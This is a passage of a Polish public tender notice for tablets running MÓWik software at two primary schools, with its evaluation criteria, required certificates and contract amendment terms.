Warunków<br/>Zamówienia.<br/>Zaoferowanie przez Wykonawcę okresu rękojmi i gwarancji dla przedmiotu zamówienia dłuższego niż 60 miesięcy nie wpływa na<br/>zwiększenie liczby punktów w tym kryterium, tj. do oceny Zamawiający przyjmie okres 60 miesięcy, natomiast do umowy<br/>Zamawiający wpisze okres gwarancji i rękojmi dla przedmiotu zamówienia wskazany przez Wykonawcę w Formularzu oferty.<br/>3) Termin dostawy (T) – waga 30% - 30 pkt:<br/>Maksymalny termin dostawy 21 dni kalendarzowych – 0 pkt.<br/>Termin dostawy 20 -15 dni kalendarzowych – 5 pkt.<br/>Termin dostawy 14 - 11 dni kalendarzowych – 15 pkt.<br/>Minimalny termin dostawy 10 - 1 dni kalendarzowych – 30 pkt.<br/>2. Termin dostawy dla przedmiotu zamówienia nie może być dłuższy niż 21 dni kalendarzowych i nie może być krótszy niż 1 dzień<br/>kalendarzowy.<br/>3. Jeśli Wykonawca nie wpisze w ofercie żadnego terminu dostawy dla przedmiotu zamówienia, bądź też wpisze w ofercie „0 (zero)”,<br/>bądź też wpisze w ofercie termin dostawy dłuższy niż 21 dni kalendarzowych, to jego oferta zostanie odrzucona jako niezgodna z treścią Specyfikacji Warunków Zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi i gwarancji dla przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia pn. Część III – &#34;Dostawa tabletu do obsługi programu MÓWik 2 dla Szkoły Podstawowej z<br/>Oddziałami Integracyjnymi im. Janusza Korczaka w Smólniku&#34; jest dostawa 1 szt. urządzenia o parametrach i ilości<br/>szczegółowo określonej w Załączniku nr 1 do SWZ.<br/>Wykonawca, zobowiązany jest załączyć do OFERTY – Załącznik Nr 2a: „Parametry techniczne oferowanego sprzętu i<br/>oprogramowania” uzupełniony w zależności od części na którą wykonawca składa ofertę - dla wszystkich oferowanych urządzeń, sprzętu, wyposażenia, opis oferowanych produktów potwierdzający spełnianie wszystkich parametrów i wymogów określonych przez Zamawiającego - opisy parametrów, opisy funkcjonalne, oświadczenia itp., w tym w szczególności -<br/>informacje o nazwie producenta, nazwie modelu / numeru katalogowego producenta dla oferowanych urządzeń. W<br/>przypadku gdy producent nie nadaje urządzeniom powyższych nazw / numeru katalogowego dla produkowanych urządzeń,<br/>wówczas Wykonawca dołączy oświadczenie, iż producent nie nadaje urządzeniom tych nazw. Załączone opisy, dokumenty<br/>muszą umożliwić Zamawiającemu weryfikację oferowanych przez Wykonawcę rozwiązań pod względem wymaganych<br/>parametrów technicznych i funkcjonalnych. Brak złożenia zał. Nr 2a, w zależności od części na którą składana jest oferta,<br/>stanowi brak możliwości oceny oferty, a tym samym podstawę odrzucenia oferty w postępowaniu.<br/>Gwarancja udzielona przez Wykonawcę musi obejmować przeniesienie prawa własności na beneficjenta Projektu.<br/>Minimalny czas trwania gwarancji udzielonej przez Wykonawcę na sprzęt wynosi 36 miesięcy (stanowi kryterium oceny ofert).<br/>Wykonawca zobowiązany jest zrealizować przedmiot zamówienia najpóźniej w terminie maksymalnie do 21 dni kalendarzowych – stanowi kryterium oceny ofert.<br/>Zamawiający dopuszcza oferowanie urządzeń równoważnych pod warunkiem, że zagwarantują one uzyskanie parametrów technicznych i funkcjonalnych nie gorszych od podanych w Opisie przedmiotu zamówienia oraz nie obniżą określonych w dokumentacji postępowania standardów. Będą posiadały wymagane odpowiednie atesty, certyfikaty lub dopuszczenia oraz zapewnią wykonanie zamówienia zgodnie z oczekiwaniami i wymaganiami Zamawiającego określonymi w SWZ.<br/>Szczegółowy zakres i opis przedmiotu zamówienia zawiera Opis przedmiotu zamówienia, stanowiący załącznik nr 1 do SWZ. Wszystkie wymagania określone w dokumentach wskazanych powyżej stanowią wymagania minimalne, a ich spełnienie jest obligatoryjne. Niespełnienie ww. wymagań minimalnych będzie skutkować odrzuceniem oferty jako niezgodnej z warunkami zamówienia na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30213200-7 - Komputer tablet</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Opis kryteriów oceny ofert wraz z podaniem wag tych kryteriów i sposobu oceny ofert.<br/>1. Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im<br/>znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>dla wszystkich części :<br/>1) Cena (C) - waga kryterium 50 % - ilość punktów 50;<br/>2) Okres rękojmi i gwarancji dla przedmiotu zamówienia - waga kryterium 20% - ilość punktów 20;<br/>3) Termin dostawy - waga kryterium 30% - ilość punktów 30;<br/>L = C + RG + T<br/>gdzie:<br/>L – całkowita liczba punktów;<br/>C – punkty uzyskane w kryterium „Cena”;<br/>RG – punkty uzyskane w kryterium „Okres rękojmi i gwarancji dla przedmiotu zamówienia”;<br/>T – punkty uzyskane w kryterium „Termin dostawy”<br/>Zasady oceny ofert w poszczególnych kryteriach:<br/>1) Cena (C) - waga 50%<br/>cena najniższa brutto*<br/>C =------------------------------------------------ x 50% - pkt 50<br/>cena oferty ocenianej brutto<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>a) podstawą przyznania punktów w kryterium &#34;cena&#34; będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>b) cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia<br/>i ceny wskazane w formularzu asortymentowo- cenowym .<br/>2) Okres rękojmi i gwarancji dla przedmiotu zamówienia (RG) - waga 20% - 20 pkt:<br/>Minimalny okres rękojmi i gwarancji 36 miesięcy (lub dłuższy ale krótszy niż 48 miesięcy) - 0 pkt.<br/>Okres rękojmi i gwarancji 48 miesięcy (lub dłuższy ale krótszy niż 60 miesięcy) – 10 pkt<br/>Maksymalny okres rękojmi i gwarancji 60 miesięcy (lub dłuższy) – 20 pkt.<br/>UWAGA:<br/>Okres gwarancji i rękojmi dla przedmiotu zamówienia nie może być krótszy niż 36 miesięcy.<br/>Jeśli Wykonawca nie wpisze w ofercie żadnego okresu udzielenia rękojmi i gwarancji dla przedmiotu zamówienia, bądź też wpisze w<br/>ofercie krótszy okres niż 36 miesięcy, to jego oferta zostanie odrzucona jako niezgodna z treścią Specyfikacji Warunków<br/>Zamówienia.<br/>Zaoferowanie przez Wykonawcę okresu rękojmi i gwarancji dla przedmiotu zamówienia dłuższego niż 60 miesięcy nie wpływa na<br/>zwiększenie liczby punktów w tym kryterium, tj. do oceny Zamawiający przyjmie okres 60 miesięcy, natomiast do umowy<br/>Zamawiający wpisze okres gwarancji i rękojmi dla przedmiotu zamówienia wskazany przez Wykonawcę w Formularzu oferty.<br/>3) Termin dostawy (T) – waga 30% - 30 pkt:<br/>Maksymalny termin dostawy 21 dni kalendarzowych – 0 pkt.<br/>Termin dostawy 20 -15 dni kalendarzowych – 5 pkt.<br/>Termin dostawy 14 - 11 dni kalendarzowych – 15 pkt.<br/>Minimalny termin dostawy 10 - 1 dni kalendarzowych – 30 pkt.<br/>2. Termin dostawy dla przedmiotu zamówienia nie może być dłuższy niż 21 dni kalendarzowych i nie może być krótszy niż 1 dzień<br/>kalendarzowy.<br/>3. Jeśli Wykonawca nie wpisze w ofercie żadnego terminu dostawy dla przedmiotu zamówienia, bądź też wpisze w ofercie „0 (zero)”,<br/>bądź też wpisze w ofercie termin dostawy dłuższy niż 21 dni kalendarzowych, to jego oferta zostanie odrzucona jako niezgodna z treścią Specyfikacji Warunków Zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi i gwarancji dla przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia pn. Część IV – &#34;Dostawa tabletu do obsługi programu MÓWik 2 oraz MÓWik Print 3.0 dla Szkoły Podstawowej z Oddziałami Integracyjnymi im. Polskich Noblistów w Kruszynie&#34; jest dostawa 1 szt. urządzenia o parametrach i ilości szczegółowo określonej w Załączniku nr 1 do SWZ.<br/>Wykonawca, zobowiązany jest załączyć do OFERTY – Załącznik Nr 2a: „Parametry techniczne oferowanego sprzętu i oprogramowania” uzupełniony w zależności od części na którą wykonawca składa ofertę - dla wszystkich oferowanych urządzeń, sprzętu, wyposażenia, opis oferowanych produktów potwierdzający spełnianie wszystkich parametrów i wymogów<br/>określonych przez Zamawiającego - opisy parametrów, opisy funkcjonalne, oświadczenia itp., w tym w szczególności - informacje o nazwie producenta, nazwie modelu / numeru katalogowego producenta dla oferowanych urządzeń. W przypadku gdy producent nie nadaje urządzeniom powyższych nazw / numeru katalogowego dla produkowanych urządzeń,<br/>wówczas Wykonawca dołączy oświadczenie, iż producent nie nadaje urządzeniom tych nazw. Załączone opisy, dokumenty muszą umożliwić Zamawiającemu weryfikację oferowanych przez Wykonawcę rozwiązań pod względem wymaganych parametrów technicznych i funkcjonalnych. Brak złożenia zał. Nr 2a, w zależności od części na którą składana jest oferta,<br/>stanowi brak możliwości oceny oferty, a tym samym podstawę odrzucenia oferty w postępowaniu.<br/>Gwarancja udzielona przez Wykonawcę musi obejmować przeniesienie prawa własności na beneficjenta Projektu.<br/>Minimalny czas trwania gwarancji udzielonej przez Wykonawcę na sprzęt wynosi 36 miesięcy (stanowi kryterium oceny ofert).<br/>Wykonawca zobowiązany jest zrealizować przedmiot zamówienia najpóźniej w terminie maksymalnie do 21 dni kalendarzowych – stanowi kryterium oceny ofert.<br/>Zamawiający dopuszcza oferowanie urządzeń równoważnych pod warunkiem, że zagwarantują one uzyskanie parametrów technicznych i funkcjonalnych nie gorszych od podanych w Opisie przedmiotu zamówienia oraz nie obniżą określonych w dokumentacji postępowania standardów. Będą posiadały wymagane odpowiednie atesty, certyfikaty lub dopuszczenia oraz zapewnią wykonanie zamówienia zgodnie z oczekiwaniami i wymaganiami Zamawiającego określonymi w SWZ.<br/>Szczegółowy zakres i opis przedmiotu zamówienia zawiera Opis przedmiotu zamówienia, stanowiący załącznik nr 1 do SWZ. Wszystkie wymagania określone w dokumentach wskazanych powyżej stanowią wymagania minimalne, a ich spełnienie jest obligatoryjne. Niespełnienie ww. wymagań minimalnych będzie skutkować odrzuceniem oferty jako niezgodnej z warunkami zamówienia na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30213200-7 - Komputer tablet</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Opis kryteriów oceny ofert wraz z podaniem wag tych kryteriów i sposobu oceny ofert.<br/>1. Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im<br/>znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>dla wszystkich części :<br/>1) Cena (C) - waga kryterium 50 % - ilość punktów 50;<br/>2) Okres rękojmi i gwarancji dla przedmiotu zamówienia - waga kryterium 20% - ilość punktów 20;<br/>3) Termin dostawy - waga kryterium 30% - ilość punktów 30;<br/>L = C + RG + T<br/>gdzie:<br/>L – całkowita liczba punktów;<br/>C – punkty uzyskane w kryterium „Cena”;<br/>RG – punkty uzyskane w kryterium „Okres rękojmi i gwarancji dla przedmiotu zamówienia”;<br/>T – punkty uzyskane w kryterium „Termin dostawy”<br/>Zasady oceny ofert w poszczególnych kryteriach:<br/>1) Cena (C) - waga 50%<br/>cena najniższa brutto*<br/>C =------------------------------------------------ x 50% - pkt 50<br/>cena oferty ocenianej brutto<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>a) podstawą przyznania punktów w kryterium &#34;cena&#34; będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>b) cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia<br/>i ceny wskazane w formularzu asortymentowo- cenowym .<br/>2) Okres rękojmi i gwarancji dla przedmiotu zamówienia (RG) - waga 20% - 20 pkt:<br/>Minimalny okres rękojmi i gwarancji 36 miesięcy (lub dłuższy ale krótszy niż 48 miesięcy) - 0 pkt.<br/>Okres rękojmi i gwarancji 48 miesięcy (lub dłuższy ale krótszy niż 60 miesięcy) – 10 pkt<br/>Maksymalny okres rękojmi i gwarancji 60 miesięcy (lub dłuższy) – 20 pkt.<br/>UWAGA:<br/>Okres gwarancji i rękojmi dla przedmiotu zamówienia nie może być krótszy niż 36 miesięcy.<br/>Jeśli Wykonawca nie wpisze w ofercie żadnego okresu udzielenia rękojmi i gwarancji dla przedmiotu zamówienia, bądź też wpisze w<br/>ofercie krótszy okres niż 36 miesięcy, to jego oferta zostanie odrzucona jako niezgodna z treścią Specyfikacji Warunków<br/>Zamówienia.<br/>Zaoferowanie przez Wykonawcę okresu rękojmi i gwarancji dla przedmiotu zamówienia dłuższego niż 60 miesięcy nie wpływa na<br/>zwiększenie liczby punktów w tym kryterium, tj. do oceny Zamawiający przyjmie okres 60 miesięcy, natomiast do umowy<br/>Zamawiający wpisze okres gwarancji i rękojmi dla przedmiotu zamówienia wskazany przez Wykonawcę w Formularzu oferty.<br/>3) Termin dostawy (T) – waga 30% - 30 pkt:<br/>Maksymalny termin dostawy 21 dni kalendarzowych – 0 pkt.<br/>Termin dostawy 20 -15 dni kalendarzowych – 5 pkt.<br/>Termin dostawy 14 - 11 dni kalendarzowych – 15 pkt.<br/>Minimalny termin dostawy 10 - 1 dni kalendarzowych – 30 pkt.<br/>2. Termin dostawy dla przedmiotu zamówienia nie może być dłuższy niż 21 dni kalendarzowych i nie może być krótszy niż 1 dzień<br/>kalendarzowy.<br/>3. Jeśli Wykonawca nie wpisze w ofercie żadnego terminu dostawy dla przedmiotu zamówienia, bądź też wpisze w ofercie „0 (zero)”,<br/>bądź też wpisze w ofercie termin dostawy dłuższy niż 21 dni kalendarzowych, to jego oferta zostanie odrzucona jako niezgodna z treścią Specyfikacji Warunków Zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi i gwarancji dla przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wymaga złożenia oświadczenia o niepodleganiu wykluczeniu w zakresie wskazanym w Rozdziale IV - wg treści Załącznika nr 3 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający nie wymaga złożenia podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Do oferty wykonawca załącza przedmiotowe środki dowodowe na potwierdzenie, że oferowane dostawy spełniają określone<br/>przez Zamawiającego wymagania, cechy lub kryteria:<br/>1. Dla stacji roboczych x 3 szt., o których mowa w Części I:<br/>1) wydruk potwierdzający spełnienie wymogu „80plus” dla zasilacza w oferowanym komputerze tj., zasilacz w oferowanym<br/>komputerze musi się znajdować na stronie http://www.plugloadsolutions.com/80pluspowersupplies.aspx;<br/>2) deklaracja zgodności CE dla urządzenia;<br/>3) certyfikaty dla producenta sprzętu potwierdzające że urządzenia wyprodukowane zostały, zgodnie z normą ISO 9001<br/>oraz ISO 50001;<br/>2. Dla monitora x 3 szt., o których mowa w Części I:<br/>1) certyfikat ISO 9001 systemu zarządzania jakością;<br/>2) certyfikat CE;<br/>2) certyfikat Energy Star potwierdzający efektywność energetyczną produktu; lub wydruk z strony: http://www.euenergystar.<br/>org lub http://www.energystar.gov;<br/>3) certyfikat jakości TCO lub wydruk ze strony potwierdzający certyfikację https://tcocertified.com/product-finder/;<br/>3. Dla klawiatury x 3 szt., o których mowa w Części I:<br/>1) certyfikat dla producenta sprzętu potwierdzający, że urządzenia wyprodukowane zostały, zgodnie z normą ISO 9001;<br/>2) certyfikat dla producenta sprzętu potwierdzający, że urządzenia wyprodukowane zostały, zgodnie z normą ISO 50001;<br/>3) deklaracja zgodności CE dla sprzętu.<br/>4. Dla myszki bezprzewodowej x 3 szt., o których mowa w Części I:<br/>1) certyfikat dla producenta sprzętu potwierdzający że urządzenia wyprodukowane zostały, zgodnie z normą ISO 9001;<br/>2) certyfikat dla producenta sprzętu potwierdzający że urządzenia wyprodukowane zostały, zgodnie z normą ISO 50001;<br/>3) deklaracja zgodności CE dla sprzętu.<br/>5. Dla monitora interaktywnego x 2 szt., o którym mowa w Części II:<br/>1) certyfikat dla producenta sprzętu potwierdzający że urządzenia wyprodukowane zostały, zgodnie z normą ISO 9001;<br/>2)	certyfikat dla producenta sprzętu potwierdzający że urządzenia wyprodukowane zostały, zgodnie z normą ISO 14001;<br/>3) certyfikat dla producenta sprzętu potwierdzający że urządzenia wyprodukowane zostały, zgodnie z normą ISO 50001;<br/>4) deklaracja zgodności CE dla sprzętu;<br/>6. Dla tabletu do obsługi programu MÓWik 2 dla Szkoły Podstawowej z Oddziałami Integracyjnymi im. Janusza Korczaka w<br/>Smólniku x 1 szt., o którym mowa w Części III:<br/>1) Certyfikat ISO 9001 dla producenta sprzętu;<br/>2) Certyfikat ISO 50001 dla producenta sprzętu;<br/>3) Deklaracja zgodności CE ;<br/>4) Certyfikat TCO - certyfikat lub wydruk ze strony http://tcocertified.com/product-finder/;.<br/>7. Dla tabletu do obsługi programu MÓWik 2 oraz MÓWik Print 3.0 dla Szkoły Podstawowej z Oddziałami Integracyjnymi im.<br/>Polskich Noblistów w Kruszynie<br/>x szt. 1, o którym mowa w Części IV:<br/>1) certyfikat ISO 9001 dla producenta sprzętu;<br/>2) certyfikat ISO 50001 dla producenta sprzętu;<br/>3) deklaracja zgodności CE ;<br/>4) certyfikat TCO - certyfikat lub wydruk ze strony http://tcocertified.com/product-finder/; <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Pełnomocnictwo - o ile dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia –art. 58-60 Pzp.<br/>W takim przypadku:<br/>1) wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika. Pełnomocnictwo powinno być do<br/>reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie<br/>przedmiotowego zamówienia publicznego. Pełnomocnictwo powinno być dołączone do oferty;<br/>2) wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z pełnomocnikiem;<br/>3) jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje następujące możliwości dokonania zmian postanowień zawartej umowy w stosunku do treści<br/>oferty, na podstawie której dokonano wyboru wykonawcy,<br/>w szczególności w sytuacjach:<br/>1) zmiany w przepisach prawa lub wykładni jego przepisów, zmiana polegać będzie na dostosowaniu wykonania umowy do<br/>obowiązujących przepisów prawa;<br/>2) wystąpienia okoliczności (zdarzeń), na które Strony umowy nie miały wpływu, a okoliczności (zdarzenia) te dotyczyły<br/>działania lub zaniechania:<br/>a) osób trzecich,<br/>b) organów administracji publicznej,<br/>zmiana polegać będzie na dostosowaniu wykonania umowy do zaistniałych okoliczności;<br/>w stosunku do okoliczności towarzyszących zawarciu umowy, a wpływających obiektywnie, bezpośrednio lub pośrednio w<br/>sposób dalece utrudniający lub czyniący niemożliwym spełnienie świadczeń Stron umowy, w sposób określony pierwotnie w<br/>umowie;<br/>3) zmiany wartości Umowy – w przypadku zwiększenia bądź zmniejszenia stawek podatku<br/>od towarów i usług, dotyczących przedmiotu zamówienia, w wyniku zmiany ustawy z dnia 11 marca 2004 roku o podatku od<br/>towarów i usług (Dz. U. 2022 poz. 931), które wejdą w życie po dniu zawarcia umowy, a przed wykonaniem przez<br/>wykonawcę obowiązku, po wykonaniu którego wykonawca jest uprawniony do uzyskania wynagrodzenia. Wynagrodzenie<br/>Wykonawcy może ulec odpowiedniemu zwiększeniu bądź zmniejszeniu, jeżeli w wyniku zastosowania zmienionych stawek<br/>podatku od towarów i usług ulega zmianie kwota należnego podatku oraz wynagrodzenie wykonawcy uwzględniające<br/>podatek od towarów i usług. Zmiana wartości umowy w zakresie dotyczącym wynagrodzenia wykonawcy będzie dokonana<br/>w ten sposób, że należne wykonawcy wynagrodzenie za wykonanie umowy będzie obliczone z uwzględnieniem stawki VAT<br/>obowiązującej w dniu wystawienia faktury VAT;<br/>4) zmiany przedmiotu umowy – w przypadku, gdy produkt stanowiący przedmiot oferty został wycofany z rynku lub<br/>zaprzestano jego produkcji, a proponowany przez wykonawcę produkt posiada nie gorsze cechy, parametry i<br/>funkcjonalność:<br/>a) niż określone dla zmienianego produktu w Specyfikacji Warunków Zamówienia;<br/>5) istnieje możliwość zastosowania nowszych i korzystniejszych dla Zamawiającego rozwiązań technologicznych lub<br/>technicznych, niż istniejące w chwili podpisania umowy.<br/>2. W przypadkach określonych w ust. 1 pkt. 4-5 wynagrodzenie wykonawcy nie ulega zmianie.<br/>3. Wprowadzenie do umowy zmian, o których mowa w ust. 1 pkt. 4-5 jest warunkowane złożeniem przez Stronę inicjującą<br/>zmianę wniosku zawierającego opis propozycji zmiany wraz z uzasadnieniem zmiany.<br/>4. Wprowadzenie do umowy zmian, o których mowa w ust. 1, wymaga zgody obydwu Stron wyrażonej w drodze pisemnego<br/>aneksu do niniejszej umowy.<br/>5. Z uwagi na zaistniałą sytuację epidemiologiczną, związaną z ogłoszeniem przez Światową Organizację Zdrowia pandemii<br/>koronawirusa (wywołującego COVID-19) strony przewidują możliwość zmiany terminu realizacji dostawy, jeżeli w<br/>konsekwencji pandemii zaistnieje zagrożenie dla wykonania zamówienia w terminie przewidzianym w umowie. W takim<br/>przypadku wynagrodzenie wykonawcy nie ulega jednak zmianie. Niniejsza zmiana zostaje wprowadzona na piśmie po<br/>uzgodnieniu przez obie strony. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – 